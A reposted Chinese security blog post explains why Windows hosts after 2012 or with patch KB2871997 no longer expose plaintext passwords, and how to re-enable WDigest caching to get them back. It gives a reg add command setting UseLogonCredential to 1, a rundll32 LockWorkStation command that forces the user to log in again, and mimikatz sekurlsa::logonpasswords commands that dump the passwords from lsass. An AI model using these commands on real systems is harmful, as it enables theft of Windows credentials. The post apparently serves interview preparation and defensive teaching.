修改WDigest获取明文密原理

admin 2022年1月4日23:01:40评论189 views字数 1034阅读3分26秒阅读模式
修改WDigest获取明文密原理
一位苦于信息安全的萌新小白帽
本实验仅用于信息防御教学,切勿用于它用途
公众号:XG小刚

无法读取明文密码
经常遇到一个面试题:在winser2012和win8之后、或打补丁kb2871997的主机不能直接获取明文密码,咋整?

WDigest
Wdigest是lsass的一种SSP程序,主要用在Win2003的LDAP和基于Web的身份验证。它利用HTTP和简单身份验证安全层 (SASL) 交换进行身份验证。
但这个认证机制会在内存中以加密的形式保存win的明文密码

我们常用的mimikatzsekurlsa::logonpasswords命令,之所以能获取明文密码全靠的这个间谍

在win2008版本之前的WDigest是默认开启的,我们是可以在lsass进程拿到明文密码的
但在win2008之后的版本设为了默认不开启,或者打了补丁kb2871997的也会处于关闭状态,这样我们就无法在lsass获取明文密码了
(注意打了补丁不一定会关闭,因为某些系统服务会用到WDigest认证,这不是绝对的)

绕过
WDigest服务虽然关闭,但是可以通过操作对应的注册表来开启他
HKLMSYSTEMCurrentControlSetContorlSecurityProvidersWdigest
打了补丁或2008之后的主机会多一个UseLogonCredential
当该项的值为1则记录明文密码,0则为不记录明文密码
记录明文密码reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
不记录明文密码reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
修改为注册表后,我们需要用户进行登录才能抓到明文密码
可以进行锁屏操作强制他登录
rundll32.exe user32.dll LockWorkStation
接下来等待用户再次登录一次,就可以继续各种对lsass的操作获取明文密码了
mimikatz # privilege::debug mimikatz # logmimikatz # sekurlsa::logonpasswords


没啥干货,普及原理

本文始发于微信公众号(XG小刚):修改WDigest获取明文密原理

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月4日23:01:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   修改WDigest获取明文密原理https://cn-sec.com/archives/466223.html

发表评论

匿名网友 填写信息